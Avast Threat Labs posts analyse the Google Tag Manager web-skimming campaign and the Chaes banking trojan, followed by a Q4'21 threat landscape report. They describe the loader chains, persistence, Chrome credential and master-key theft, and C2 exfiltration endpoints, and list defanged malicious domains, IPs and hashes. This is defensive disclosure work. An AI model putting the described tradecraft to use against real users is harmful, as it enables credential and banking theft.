webfaset[.]com 2021-04-13 193[.]203[.]203[.]56
pixstatics[.]com 2021-05-19 193[.]203[.]203[.]56
ganalitis[.]com 2021-10-21 91[.]242[.]229[.]96
gstatsc[.]com 2021-12-13 91[.]242[.]229[.]96
gstatlcs[.]com 2021-12-15 193[.]203[.]203[.]14
gstatuslink[.]com 2022-01-02 91[.]242[.]229[.]96
gtagmagr[.]com 2022-01-05 193[.]203[.]203[.]14

The second stage (downloaded from the malicious domain) is a file named favicon (later renamed to refresh) that contains about 400 lines of obfuscated javascript code. We found that this code was being changed over time to avoid detection. The deobfuscated code is shown below, almost everything out of the 400 lines of code was just obfuscation. This file hides malicious code responsible for downloading the final stage through WebSockets.

The final stage of malware is downloaded through WebSockets. First, the web page sends its hostname, and then according to that information the corresponding malicious javascript is received. This communication is shown in the image below.

Malicious javascript code is about 1k lines long (formatted) and as the previous stage is also obfuscated. This code is responsible for stealing the payment details. At the end of the obfuscated javascript code (shown in the image below) is configuration which is different for every infected eshop. The red box at the bottom shows the configuration where the fake payment form will be inserted into an HTML file on the infected website.

The end of the third stage file that contains configuration

The code from the yellow box is decoded in the white box. It is a dictionary, the key E528330211747l contains the form field names that match the input form field names on the infected webpage. The last key contains an exfiltration URL that is encoded in base64. In the image below is a code from an infected website, we can see that the id of the email field (customer-email) is in the mentioned code.

The missing field names (from fake payment form) are in the variable a0_0x11ac38. Which is an array and contains the following fields:

The fake payment form embedded on the infected website is shown in the image below. Above is the infected webpage, while below is how the webpage looks normally.

E-commerce website with fake payment form

The stolen payment details (including details such as name and address) are sent to the attacker encoded in base64 through WebSockets.

Affected users

In the map below are shown countries with the most affected users. The top is Argentina, because of prune[.]com[.]ar. Site was infected with the new malicious domain gstatlcs[.]com.

The second one is Saudi Arabia e-commerce website souqtime[.]com. From RiskIQ data we can see that this e-commerce website was infected over time with at least seven different web skimming domains.

Currently Avast detects the malicious domain gstatuslink[.]com on souqtime[.]com.


Overall, we can say that the attacker uses Google Tag Manager to avoid detection. At the same time they were able to change the domains from which the malicious code was loaded over time, he also changed the malicious code itself to hide from detection by antivirus.

Some websites were infected for several months (for example souqtime[.]com). It can be difficult for users to spot that the site is infected. For example, it is suspicious if the user fills in the payment form on the website itself and is then redirected to another payment form on the payment gateway webpage. But in cases where the payment form is normally present directly on the e-commerce website and the attacker steals payment details from this legitimate form, it is really hard to notice that the website is infected. Therefore we recommend using a second factor (e.g. mobile app or SMS code) to confirm internet payments if the bank supports it.

Website owners should keep software updated, monitor logs for any suspicious activity, use strong passwords and also use Web Application Firewall.

IOC malicious domains:

  • pixstatics[.]com
  • ganalitics[.]com
  • bingfindapi[.]com
  • webfaset[.]com
  • ganalitis[.]com
  • gstatsc[.]com
  • gstatlcs[.]com
  • gstatuslink[.]com
  • gtagmagr[.]com

The post Web Skimming Attacks Using Google Tag Manager appeared first on Avast Threat Labs.

Chasing Chaes Kill Chain

25 January 2022 at 13:43


Chaes is a banking trojan that operates solely in Brazil and was first reported in November 2020 by Cybereason. In Q4 2021, Avast observed an increase in Chaes’ activities, with infection attempts detected from more than 66,605 of our Brazilian customers. In our investigation, we found the malware is distributed through many compromised websites, including highly credible sites. Overall, Avast has found Chaes’ artifacts in 800+ websites. More than 700 of them contain Brazilian TLDs. All compromised websites are WordPress sites, which leads us to speculate that the attack vector could be exploitation of vulnerabilities in WordPress CMS. However, we are unable to perform forensics to confirm this theory. We immediately shared our findings with the Brazilian CERT (BR Cert) with the hope of preventing Chaes from spreading. By the time of this publication, Chaes’ artifacts still remain on some of the websites we observed.

Chaes is characterized by the multiple-stage delivery that utilizes scripting frameworks such as JScript, Python, and NodeJS, binaries written in Delphi, and malicious Google Chrome extensions. The ultimate goal of Chaes is to steal credentials stored in Chrome and intercept logins of popular banking websites in Brazil.

In this posting, we present the results of our analysis of the Chaes samples we found in Q4 2021. Future updates on the latest campaign will be shared via Twitter or a later post.

Infection Scheme

When someone reaches a website compromised by Chaes, they are presented with the below pop-up asking users to install the Java Runtime application:

If the user follows the instructions, they will download a malicious installer that poses as a legitimate Java Installer. As shown below, the fake installer closely imitates the legitimate Brazilian Portuguese Java installer in terms of appearance and behavior.

Once the installation begins, the user’s system is compromised. After a few minutes, all web credentials, history, user profiles stored by Chrome will be sent to attackers. Users may experience Google Chrome getting closed and restarted automatically. This indicates any future interactions with the following Brazilian banking websites will be monitored and intercepted:


Technical Analysis

Infected websites

Upon inspecting the HTML code of the compromised websites, we found the malicious script inserted as shown below:

In this case, the V=28 likely represents the version number. We also found a URL with other versions as well:

  • https://is[.]gd/EnjN1x?V=31
  • https://is[.]gd/oYk9ielu?D=30
  • https://is[.]gd/Lg5g13?V=29
  • https://is[.]gd/WRxGba?V=27
  • https://is[.]gd/3d5eWS?V=26

The script creates an HTML element that stays on top of the page with “Java Runtime Download” lure. This element references an image from a suspicious URL

  • https://sys-dmt[.]net/index.php?D\
  • https://dmt-sys[.]net/

and an on-click download of a Microsoft Installer from

  • https://bkwot3kuf[.]com/wL38HvYBiOl/index.php?get or
  • https://f84f305c[.]com/aL39HvYB4/index.php?get or
  • https://dragaobrasileiro[.]

Microsoft Installer

The flowchart below shows the infection chain following the malicious installer execution.

Inside the MSI package

The installer contains 3 malicious JS files install.js, sched.js, and sucesso.js renamed to Binary._ as shown above. Each of them handles a different task, but all are capable of reporting the progress to the specified CnC:

Implementation of the logging function across all 3 scripts


The purpose of this script is to download and execute a setup script called runScript that will prepare the proper Python environment for the next stage loader. After making an HTTP request to a hardcoded domain, the obfuscated runScript is downloaded and then executed to perform the following tasks:

  • Check for Internet connection (using
  • Create %APPDATA%\\<pseudo-random folder name>\\extensions folder
  • Download password-protected archives such as python32.rar/python64.rar and unrar.exe to that extensions folder
  • Write the path of the newly created extensions folder to HKEY_CURRENT_USER\\Software\\Python\\Config\\Path
  • Performs some basic system profiling
  • Execute unrar.exe command with the password specified as an argument to unpack python32.rar/python64.rar
  • Connect to C2 and download 32bit and 64bit scripts along with 2 encrypted payloads. Each payload has a pseudo-random name.
runScript.js content


The purpose of this script is to set up persistence and guarantee the execution of downloaded by runScript from the previous step. Sched.js accomplishes this by creating a Scheduled Task as its primary means and creating a  Startup link as its backup means. Ultimately, they are both able to maintain the after-reboot execution of the following command:

 ...\\<python32|python64>\\pythonw.exe /m

ScheduledTask Configuration


This script reports to CnC that the initial installation on the victim’s computer has succeeded and is ready for the next stage

Python Loader Chain

The Scheduled Task created by sched.js eventually starts which initiates the Python in-memory loading chain. The loading chain involves many layers of Python scripts, JS scripts, shellcode, Delphi DLLs, and .NET PE which we will break down in this section. Impressively, the final payload is executed within process (PID 2416 and 4160) as shown below:

Obfuscated content

The  xor decrypts and decompresses the pseudo-random filename downloaded by runScript.js into another Python script. The new Python script contains 2 embedded payloads: image and shellcode in encrypted form. Image represents the Chaes loader module called chaes_vy.dll while shellcode is an in-memory PE loader. We found this particular loader shellcode reappearing many times in the later stages of Chaes. Running the shellcode using CreateThread API with proper parameters pointing to chaes_vy.dll, the Python script eventually loads chaes_vy.dll into memory:

chaes_vy.dll is loaded into memory by an embedded shellcode


Chaes_vy is a Delphi module that loads an embedded .NET executable that in turn runs 2 JavaScripts: script.js and engine.js. These two scripts hold the core functionalities of the Chaes_vy module.


This script acts as the interface between .NET framework and JScript framework, providing the necessary utilities to execute any scripts and modules that engine.js downloads in the future. By default, script.js will try to retrieve the paths to payloads specified in the argument of If nothing is found it will execute engine.js


This script employs 2 methods of retrieving a JS payload: getBSCode() and getDWCode() both are called every 6 minutes.

GetBSCode is the primary method, also the only one we are able to observe serving payload. The encrypted payload is hidden as commented-out code inside the HTML page of a Blogspot which is shown below. Without being infected by Chaes, this site is completely harmless.

View of the Blogpost page contains hidden malicious code

On the other hand, when executed, engine.js will parse the string starting from  <div id=\”rss-feed\”> which is the marker of the encrypted payload:

Hidden code

After decrypting this text using AES with a hardcoded key, instructions.js is retrieved and executed. This script is in charge of downloading and executing Chaes’ malicious Chrome “extensions”. More info about instructions.js is provided in the next section.

getDWCode is the secondary method of retrieving instruction.js. It employs a DGA approach to find an active domain weekly when getBSCode fails. Since we are not able to observe this method being used successfully in the wild, we have no analysis to present here. However, you can check out the full algorithm posted on our Github.


Instructions.js is the last stage of the delivery chain. Nothing up to this point has gained the attacker any true benefits. It is the job of instructions.js to download and install all the malicious extensions that will take advantage of the Chrome browser and harm the infected users. The address of all payloads are hardcoded as shown below:

The extensions are separated into password-protected archives vs encrypted binaries. The non-compressed payloads are PE files that can be run independently while compressed ones add necessary NodeJS packages for the extension to run. Below is the example of chremows63_64 archive contents:

All the binaries with dll_filename argument such as chromeows2.bin are encrypted, including the ones inside the RAR archive. The decryption algorithm is located inside script.js as we mentioned in the previous section. To decrypt and run each binary, Chaes needs to call with the file path specified as an argument.

The extension installation can be simplified into the following steps:

  • An HTTP Request (aws/isChremoReset.php)  is sent to check if Google Chrome from a particular uid has been hooked. If not, Chrome and NodeJS will be closed. More information about uid in the “Online” section below.
  • The download request is constructed based on 3 scenarios: 32bit, 64bit, and no Google Chrome found. Each scenario will contain suitable versions of the extensions and their download links.
  • The extension is downloaded. The compressed payload will be unpacked properly.
  • A hosts file is created for the newly downloaded module. Inside the file is the CnC randomly picked from the following pool:

Each extension will use the address specified in hosts for CnC communication

  • Launch each extension through python.exe with proper arguments as shown below



online.dll is a short-lived Delphi module that is executed by instruction.js before other modules are deployed. Its main purpose is to fingerprint the victim by generating a uid which is a concatenation of drive C: VolumeSerialNumber, UserName, and Computername. The uid is written to a register key SOFTWARE\\Python\\Config\uid before being included inside the beaconing message.

This registry key is also where instruction.js previously gets the uid asking CnC if the victim’s Chrome has been hooked. The first time instruction.js gets launched this registry has not been created yet, therefore the Chrome process is always killed.

Online.dll retrieves the CnC server specified in the hosts file and performs the beaconing request /aws/newClient.php, sending the victim’s uid and basic system information.

Mtps4 (MultiTela Pascal)

Module mtps4 is a backdoor written in Delphi. Its main purpose is to connect to CnC and wait for a responding PascalScript to execute. Similar to the previous module, CnC is retrieved from the hosts file. Mtps4 sends a POST request to the server with a hardcoded User-Agent containing uid and command type. It currently supports 2 commands: start and reset. If the reset command is responded with ‘(* SCRIPT OK *)’, it will terminate the process.

Start command is a bit more interesting.

Example of an HTTP request with “start” command

As a reply to this command, it expects to receive a PascalScript code containing a comment (* SCRIPT OK *)’.

mtps4 is compiled with to support PascalScript. Before running, the script they create a window that copies the screen and covers the entire desktop to avoid raising suspicion when performing malicious tasks on the system.

Unfortunately during the investigation, we couldn’t get hold of the actual script from the CnC.

Chrolog (ChromeLog)

Chrolog is a Google Chrome Password Stealer written in Delphi. Although it is listed as an extension, Chrolog is an independent tool that extracts user personal data out of the Chrome database and exfiltrates them through HTTP. The CnC server is also retrieved from the hosts file previously created by instruction.js.

HTTP Request Data Exfiltration
/aws/newUpload.php Cookies, Web Data, and Login Data (encrypted)
/aws/newMasterKey.php Chrome Master Key used to decrypt Login Data
/aws/newProfileImage.php Profile Image URL collected from last_downloaded_gaia_picture_url_with_size attribute inside Local State
/aws/newPersonalData.php Username, fullname, gaia_name
/aws/bulkNewLogin.php All Login Data is decrypted and added to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewUrl.php History is added to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewAdditionalData.php Web Data is written to local.sql database. Then the corresponding section of the database is exfiltrated
/aws/bulkNewProcess.php All running processes are collected and written to local.sql database. Then the corresponding section of the database is exfiltrated
(Cookies, Web Data, Login Data, History, and Local State is standardly located at %APPDATA%\\Local\\Google\\Chrome\\User Data\\Default\\)

Chronodx (Chrome Noder)

chrolog.rar contains NodeJS packages and chronodx.bin aka Chronod2.dll.
Chronodx dependency (“name”: “chremows” is indeed how it is defined)

The chronodx extension package can be separated into 2 parts: a loader called Chronod2.dll and a JavaScript banking trojan called index_chronodx2.js. First, Chronod2.dll performs an HTTP request /dsa/chronod/index_chronodx2.js to retrieve index_chronodx2.js. If successful, Chronod2.dll will run silently in the background until it detects the Chrome browser opened by the user. When that happens, it will close the browser and reopen its own instance of Chrome along with index_chronodx2.js being run from the node.exe process.

Chronodx in idle mode
Chronodx reopens Chrome and executes “node.exe index.js command
Index.js is index_chronodx2.js in this case

Index_chronodx2.js utilizes puppeteer-core, a NodeJS framework that provides APIs to control Chrome browser, for malicious purposes. Index_chronodx2.js implements many features to intercept popular banking websites in Brazil including


Upon visiting any of the above websites, index_chronodx2.js will start collecting the victim’s banking info and send it to the attacker through a set of HTTP commands. The CnC server is stored in the hosts file, but when it is not found in the system, a hardcoded backup CnC will be used instead:

C2 Command Meaning
/aws/newQRMPClient.php Supposedly sending user info to the attacker when a QR code scan is found on banking websites listed above, but this feature is currently commented out
/aws/newContaBBPF.php Sending user banking info when Bancodobrasil banking sites are intercepted
/aws/newContaCef.php Sending user banking info when Caixa banking sites are intercepted
/aws/newCaixaAcesso.php Telling the attacker that a victim has accessed Caixa banking page
aws/newMercadoCartao.php Sending user banking info when Mercado banking sites are intercepted
/aws/newExtraLogin.php Send user credentials when logging in to one of the listed pages

Chremows (Chrome WebSocket)

Chremows is another extension that uses NodeJS and puppeteer-core, and is similar to the functionality of node.js mentioned in the Cybereason 2020 report. Chremows targets two platforms Mercado Livre ( and Mercado Pago ( both belong to an online marketplace company called Mercado Libre, Inc.

Chremows dependency

Sharing the same structure of chronodx module, chremows contains a loader, CreateChrome64.dll that downloads a JavaScript-based banking trojan called index.js. CreateChrome64.dll will automatically update index.js when a newer version is found. Unlike chronodx, chremows executes index.js immediately after download and doesn’t require Google Chrome to be opened. In a separate thread, CreateChrome64.dll loads an embedded module ModHooksCreateWindow64.dll that Cybereason has analyzed in their 2020 report. Overall, this module help increase the capabilities that chremows has on Google Chrome, allowing the attacker to perform “active” tasks such as sending keypresses/mouse clicks to Chrome, or opening designated pages. Finally, CreateChrome64.dll copies Chrome’s Local State file to the same location of index.js with the name local.json. Index.js uses local.json to help the attacker identify the victim.

Hardcoded CnC

Index.js employs two methods of communicating with the attacker: through WebSocket and through HTTP. Each method has its own set of C2 servers as shown in the above picture. WebSocket is used to receive commands and send client-related messages. On the other hand, HTTP is for exfiltrating financial data such as banking credentials and account information to the attacker.

List of known Index.js WebSocket commands

Command from C2 Functionality
welcome:: Send uid and information extract from local.json to the attacker
control:: The attacker establishes control over Google Chrome
uncontrol:: The attacker removes control over Google Chrome
ping:: Check if the connection to the client is OK
command:: Send command such as keystroke, mouseclick
openbrowser:: Open Chrome window with minimal size to stay hidden

If the user stays connected to the WebSocket C2 server, every six minutes it automatically goes to the targeted Mercado Pago and Mercado Livre pages and performs malicious tasks. During this routine, the attacker loses direct control of the browser. The target pages are banking, credit, and merchant pages that require users’ login. If the user has not logged out of these pages, the attacker will start to collect data and exfiltrate them through the following HTTP requests:

  • /aws/newMercadoCredito.php
  • /aws/newMercadoPago.php

If the user is not logged in to those pages but has the password saved in Chrome, after the routine ends, the attackers will get back their direct control of Chrome and log in manually.


Chaes exploits many websites containing CMS WordPress to serve malicious installers. Among them, there are a few notable websites for which we tried our best to notify BR Cert. The malicious installer communicates with remote servers to download the Python framework and malicious Python scripts which initiate the next stage of the infection chain. In the final stage, malicious Google Chrome extensions are downloaded to disk and loaded within the Python process. The Google Chrome extensions are able to steal users’ credentials stored in Chrome and collect users’ banking information from popular banking websites.


The full list of IoCs is available here


HTML Scripts

  • is[.]gd/EnjN1x?V=31
  • is[.]gd/oYk9ielu?D=30
  • is[.]gd/Lg5g13?V=29
  • tiny[.]one/96czm3nk?v=28
  • is[.]gd/WRxGba?V=27
  • is[.]gd/3d5eWS?V=26

MSI Download URLs

  • dragaobrasileiro[.]
  • chopeecia[.]
  • bodnershapiro[.]com/blog/wp-content/themes/twentyten/p.php?
  • dmt-sys[.]net/index.php?
  • up-dmt[.]net/index.php?
  • sys-dmt[.]net/index.php?
  • x-demeter[.]com/index.php?
  • walmirlima[.]
  • atlas[.]
  • apoiodesign[.]com/language/overrides/p.php?

CnC Servers

  • 200[.]234.195.91
  • f84f305c[.]com
  • bkwot3kuf[.]com
  • comercialss[.]com
  • awsvirtual[.]
  • cliq-no[.]link
  • 108[.]166.219.43
  • 176[.]123.8.149
  • 176[.]123.3.100
  • 198[.]23.153.130
  • 191[.]252.110.241
  • 191[.]252.110.75

SHA256 Hashes

Filename Hash
MSI installer f20d0ffd1164026e1be61d19459e7b17ff420676d4c8083dd41ba5d04b97a08c
7a819b168ce1694395a33f60a26e3b799f3788a06b816cc3ebc5c9d80c70326b 70135c02a4d772015c2fce185772356502e4deab5689e45b95711fe1b8b534ce
runScript.js bd4f39daf16ca4fc602e9d8d9580cbc0bb617daa26c8106bff306d3773ba1b74
engine.js c22b3e788166090c363637df94478176e741d9fa4667cb2a448599f4b7f03c7c
image 426327abdafc0769046bd7e359479a25b3c8037de74d75f6f126a80bfb3adf18
chremows fa752817a1b1b56a848c4a1ea06b6ab194b76f2e0b65e7fb5b67946a0af3fb5b
chrolog 9dbbff69e4e198aaee2a0881b779314cdd097f63f4baa0081103358a397252a1
chronod ea177d6a5200a39e58cd531e3effb23755604757c3275dfccd9e9b00bfe3e129
online 3fd48530ef017b666f01907bf94ec57a5ebbf2e2e0ba69e2eede2a83aafef984
mtps4 5da6133106947ac6bdc1061192fae304123aa7f9276a708e83556fc5f0619aab

The post Chasing Chaes Kill Chain appeared first on Avast Threat Labs.

Avast Q4/21 Threat report

26 January 2022 at 21:18


Welcome to the Avast Q4’21 Threat Report! Just like the rest of last year, Q4 was packed with many surprises and plot twists in the threat landscape. Let me highlight some of them.

We all learned how much impact a small library for logging can have. Indeed, I’m referring to the Log4j Java library, where a vulnerability was discovered and immediately exploited. The rate at which malware operators exploited the vulnerability was stunning. We observed coinminers, RATs, bots, ransomware, and of course APTs abusing the vulnerability faster than a software vendor could say “Am I also using this Log4j library somewhere below?”. In a nutshell: Christmas came early for malware authors.

Original credits: XKCD

Furthermore, in my Q3’21 foreword, I mentioned the take-down of botnet kingpin, Emotet. We were curious which bot would replace it… whether it would be Trickbot, IcedID, or one of the newer ones. But the remaining Emotet authors had a different opinion, and pretty much said “The king is dead, long live the king!”, they rewrote several Emotet parts, revived their machinery, and took the botnet market back with the latest Emotet reincarnation.

Out of the other Q4’21 trends, I would like to highlight an interesting symbiosis of a particular adware strain that is protected by the Cerbu rootkit, which was very active in Africa and Asia. Furthermore, coinminers increased by 40% worldwide by infecting webpages and pirated software. In this report, we also provide a sneak peek into our recent research of banking trojans in Latin America and also dive into the latest in the mobile threat landscape.

Last but not least, Q4’21 was also special in terms of ransomware. However, unlike in previous quarters when you could only read about massive increases in attacks, ransom payments, or high-profile victims, Q4 brought us a long-awaited drop of ransomware activity by 28%! Why? Please, continue reading.

Jakub Křoustek, Malware Research Director


This report is structured as two main sections – Desktop, informing about our intel from Windows, Linux, and MacOS, and Mobile, where we inform about Android and iOS threats.

Furthermore, we use the term risk ratio in this report for informing about the severity of particular threats, which is calculated as a monthly average of “Number of attacked users / Number of active users in a given country”. Unless stated otherwise, the risk is available just for countries with more than 10,000 active users per month.


Advanced Persistent Threats (APTs)

Advanced Persistent Threats are typically created by Nation State sponsored groups which, unlike cybercriminals, are not solely driven by financial gain. These groups pursue nation states’ espionage agenda, which means that specific types of information, be it of geopolitical importance, intellectual property, or even information that could be used as a base for further espionage, are what they are after.

In December, we described a backdoor we found in a lesser known U.S. federal government commission. The attackers were able to run code on an infected machine with System privileges and used the WinDivert driver to read, filter and edit all network communication of the infected machine. After several unsuccessful attempts to contact the targeted commission over multiple channels, we decided to publish our findings in December to alert other potential victims of this threat. We were later able to engage with the proper authorities who are in possession of our full research and took action to remediate the threat.

Early November last year, we noticed the LuckyMouse APT group targeting two countries: Taiwan and the Philippines. LuckyMouse used a DLL sideload technique to drop known backdoors. We spotted a combination of the HyperBro backdoor with the Korplug backdoor being used. The dropped files were signed with a valid certificate of Cheetah Mobile Inc.

The top countries where we saw high APT activity were: Myanmar, Vietnam, Indonesia, and Ukraine. An actor known as Mustang Panda is still active in Vietnam. We also tracked a new campaign in Indonesia that appears to have been initiated in Q4’21.

The Gamaredon activity we observed in Q3’21 in Ukraine dropped significantly about a week before the Ukrainian Security Service publicly revealed information regarding the identities of the Gamaredon group members. Nevertheless, we still saw an increase in APT activity in the country. 

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Daniel Beneš, Malware Researcher


Adware, as the name suggests, is software that displays ads, often in a disturbing way, without the victim realizing what is causing the ads to be displayed. We primarily monitor adware that is potentially dangerous and is capable of adding a backdoor to victims’ machines. Adware is typically camouflaged as legitimate software, but with an easter egg.

Desktop adware has become more aggressive in Q4’21, illustrated in the graph below. In comparison to Q3’21, we saw a significant rise in adware in Q4’21 and a serious peak at the beginning of Q4’21. Moreover, the incidence trend of adware in Q4’21 is very similar to the rootkit trend, which will be described later. We believe these trends are related to the Cerbu rootkit that can hijack requested URLs and then serve adware.

The risk ratio of adware has increased by about 70% worldwide in contrast to Q3’21. The most affected regions are Africa and Asia.

In terms of regions where we protected the most users from adware, users in Russia, the U.S., and Brazil were targeted the most in Q4’21.

Martin Chlumecký, Malware Researcher


The last quarter of 2021 was everything but uneventful in the world of botnets. Celebrations of Emotet’s takedown were still ongoing when we started to see Trickbot being used to resurrect the Emotet botnet. It looks like “Ivan” is still not willing to retire and is back in business. As if that wasn’t enough, we witnessed a change in Trickbot’s behavior. As can be seen in the chart below, by the end of November, attempts at retrieving the configuration file largely failed. By the middle of December, this affected all the C&Cs we have identified. While we continue to observe traffic flowing to a C&C on the respective ports, it does not correspond to the former protocol.

Just when we thought we were done with surprises, December brought the Log4shell vulnerability, which was almost immediately exploited by various botnets. It ought to be no surprise that one of them was Mirai, again. Moreover, we saw endpoints being hammered with bots trying to exploit the vulnerability. While most of the attempts lead to DNS logging services, we also noticed several attempts that tried to load potentially malicious code. We observed one interesting thing about the Log4shell vulnerability: While a public endpoint might not be vulnerable to Log4shell, it could still be exploited if logs are sent from the endpoint to another logging server.

Below is a heatmap showing the distribution of botnets that we observed in Q4 2021.

As for the overall risk ratios, the top of the table hasn’t changed much since Q3’21 and is still occupied by Afghanistan, Turkmenistan, Yemen, and Tajikistan. What has changed is their risk ratios have significantly increased. A similar risk ratio increase occurred for Japan and Portugal, even though in absolute value their risk ratio is still significantly lower than in the aforementioned countries. The most common botnets we saw in the wild are:

  • Phorpiex
  • BetaBot
  • Tofsee
  • Mykings
  • MyloBot
  • Nitol
  • LemonDuck
  • Emotet
  • Dorkbot
  • Qakbot

Adolf Středa, Malware Researcher


Even though cryptocurrencies experienced turbulent times, we actually saw an increase of malicious coin mining activity, it increased by a whooping 40% in our user base in Q4’21, as can be seen on the daily spreading chart below. This increase could be also influenced by the peak in Ethereum and Bitcoin prices in November. 

The heat map below shows that in comparison to the previous quarter, there was a higher risk of a coin miner infection for users in Serbia and Montenegro. This is mainly due to a wider spreading of web miners in these regions, attempting to mine cryptocurrencies while the victim is visiting certain webpages. XMRig is still the leader choice among the popular coinminers.

CoinHelper is one of the prevalent coinminers that was still very active throughout Q4’21, mostly targeting users in Russia and the Ukraine. When the malware is executed on a victim’s system, CoinHelper downloads the notorious XMRig miner via the Tor network and starts to mine. Apart from coin mining, CoinHelper also harvests various information about its victims to recognize their geolocation, what AV solution they have installed, and what hardware they are using.

The malware is being spread in the form of a bundle with many popular applications, cracked software such as MS Office, games and game cheats like Minecraft and Cyberpunk 2077, or even clean installers, such as Google Chrome or AV products, as well as hiding in Windows 11 ISO image, and many others. The scope of the spreading is also supported by seeding the bundled apps via torrents, further abusing the unofficial way of downloading software.

Even though we observed multiple crypto currencies, including Ethereum or Bitcoin, configured to be mined, there was one particular type that stood out – Monero. Even though Monero is designed to be anonymous, thanks to the wrong usage of addresses and the mechanics of how mining pools work, we were able to get a deeper look into the malware authors’ Monero mining operation and find out that the total monetary gain of CoinHelper was 339,694.86 USD as of November, 29, 2021.

Cryptocurrency Earnings in USD Earnings in cryptocurrency Number of wallets
Monero $292,006.08 1,216.692 [XMR] 311
Bitcoin $46,245.37 0.800 [BTC] 54
Ethereum $1,443.41 0.327 [ETH] 5
Table with monetary gain (data refreshed 2021-11-29)

Since the release of our CoinHelper blogpost, the miner was able to mine an additional ~15.162 XMR as of December 31, 2021 which translates to ~3,446.03 USD. With this calculation, we can say that at the turn of the year 2021, CoinHelper was still actively spreading, with the ability to mine ~0.474 XMR every day.

Jan Rubín, Malware Researcher
Jakub Kaloč, Malware Researcher

Information Stealers

In comparison with the previous quarters, we saw a slight decrease in information stealer in activity. The reason behind this is mainly a significant decrease in Fareit infections, which dropped by 61%. This places Fareit to sixth position from the previously dominant first rank, holding roughly 9% of the market share now. To this family, as well as to all the others, we wish a happy dropping in 2022!

The most prevalent information stealers in Q4’21 were AgentTesla, FormBook, and RedLine stealers. If you happen to get infected by an infostealer, there is almost a 50% chance that it will be one of these three.

Even though infostealers are traditionally popular around the world, there are certain regions where there is a greater risk of encountering one. Users in Singapore, Yemen, Turkey, and Serbia are most at risk of losing sensitive data. Out of these countries, we only saw an increase in risk ratio in Turkey when comparing the ratios to Q3’21.

Finally, malware strains based on Zeus still dominate the banking-trojan sector with roughly 40% in market share. However, one of these cases, the Citadel banker, experienced a significant drop in Q4’21, providing ClipBanker a space to grow.

Jan Rubín, Malware Researcher

LatAm Region

Latin America has always been an interesting area in malware research due to the unique and creative TTPs employed by multiple threat groups operating within this regional boundary. During Q4’21, a threat group called Chaes dominated Brazil’s threat landscape with infection attempts detected from more than 66,600 of our Brazilian customers. Compromising hundreds of WordPress web pages with Brazilian TLD, Chase serves malicious installers masquerading as Java Runtime Installers in Portuguese. Using a complex Python in-memory loading chain, Chaes installs malicious Google Chrome extensions onto victims’ machines. These extensions are capable of intercepting and collecting data from popular banking websites in Brazil such as Mercado Pago, Mercado Livre, Banco do Brasil, and Internet Banking Caixa.

Ousaban is another high-profile regional threat group whose operations in Brazil can be traced back to 2018. Getting massive attention in Q2’21 and Q3’21, Ousaban remains active during the Q4’21 period with infection attempts detected from 6,000+ unique users. Utilizing a technique called side-loading, Ousaban’s malicious payload is loaded by first executing a legitimate Avira application within a Microsoft Installer. The download links to these installers are mainly found in phishing emails which is Ousaban’s primary method of distribution.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher


Let’s go back in time a little bit at first, before we dive into Q4’21 ransomware activity. In Q3’21, ransomware warfare was escalating, without a doubt. Most active strains were more prevalent than ever before. There were newspaper headlines about another large company being ransomed every other day, a massive supply-chain attack via MSP, record amounts of ransom payments, and sky-high self-esteem of cybercriminals.

Ransomware carol found on a darknet malware forum.

While unfortunate, this havoc triggered a coordinated cooperation of nations, government agencies, and security vendors to hunt down ransomware authors and operators. The FBI, the U.S. Justice Department, and the U.S. Department of State started putting marks on ransomware gangs via multi-million bounties, the U.S. military acknowledged targeting cybercriminals who launch attacks on U.S. companies, and we even started witnessing actions by Russian officials. The most critical part was the busts of ransomware-group members by the FBI, Europol, and DoJ in Q4’21.

We believe all of this resulted in a significant decrease in ransomware attacks in Q4’21. In terms of the ransomware risk ratio, it was lower by an impressive 28% compared to Q3’21. We hope to see a continuation of this trend in Q1’22, but we are also prepared for the opposite.

The positive decrease of the risk ratio Q/Q was evident in the majority of countries where we have our telemetry, with a few exceptions such as Bolivia, Uzbekistan, and Mongolia (all with more than +400% increase), Kazakhstan and Belarus (where the risk ratio doubled Q/Q), Russia (+49%), Slovakia (+37%), or Austria (+25%).

The most prevalent strains from Q3’21 either vanished or significantly decreased in volume in Q4’21. For example, the operators and authors of the DarkMatter ransomware went silent, most probably because a $10 million bounty was put on their heads by the FBI. Furthermore, STOP ransomware, which was the most prevalent strain in Q3’21, was still releasing new variants regularly to lure users seeking pirated software, but the number of targeted (and protected) users dropped by 58% and its “market share” decreased by 36%. Another strain worth mentioning was Sodinokibi aka REvil – its presence decreased by 50% in Q4’21 and it will be interesting to monitor its future presence because of the circumstances happening in Q1’22 (greetings to Sodinokibi/REvil gang members currently sitting custody).

The most prevalent ransomware strains in Q4’21: 

  • STOP
  • WannaCry
  • Sodinokibi
  • Conti
  • CrySiS
  • Exotic
  • Makop
  • GlobeImposter
  • GoRansomware
  • VirLock

Not everything ransomware related was positive in Q4’21. For example, new strains were discovered that could quickly emerge in prevalence, such as BlackCat (aka ALPHV) with its RaaS model introduced on darknet forums or a low-quality Khonsari ransomware, which took the opportunity to be the first ransomware exploiting the aforementioned Log4j vulnerability and thus beating the Conti in this race.

Last, but not least, I would like to mention new free ransomware decryption tools we’ve released. This time for AtomSilo, LockFile, and Babuk ransomware. AtomSilo is not the most prevalent strain, but it has been constantly spreading for more than a year. So we were happy as our decryptor immediately started helping ransomware victims.

Jakub Křoustek, Malware Research Director

Remote Access Trojans (RATs)

The last weeks of Q4’21 are also known as “days of peace and joy” and this claim also applies for malicious actors. As you can see in the graph below of RAT activity for this quarter, it is obvious that malware actors are just people and many of them took holiday breaks, that’s probably why the activity level during the end of December more than halved. The periodical drops that can be seen are weekends as most campaigns usually appear from Monday to Thursday.

In the graph below, we can see a Q3/Q4 comparison of the RAT activity.

The heat map below shines with multiple colors like a Christmas tree and among the countries with the highest risk ratio we see Czech Republic, Singapore, Serbia, Greece, and Croatia. We also detected a high Q/Q increase of the risk ratio in Slovakia (+39%), Japan (+30%), and Germany (+23%).

Most prevalent RATs in Q4’21:

  • Warzone
  • njRAT
  • Remcos
  • NanoCore
  • AsyncRat
  • QuasarRAT
  • NetWire
  • SpyNet
  • DarkComet
  • DarkCrystal

The volume of attacks and protected users overall was similar to what we saw in Q3’21, but there was also an increase within families, such as Warzone or DarkCrystal (their activity more than doubled), SpyNet (+89%) and QuasarRAT(+21%)

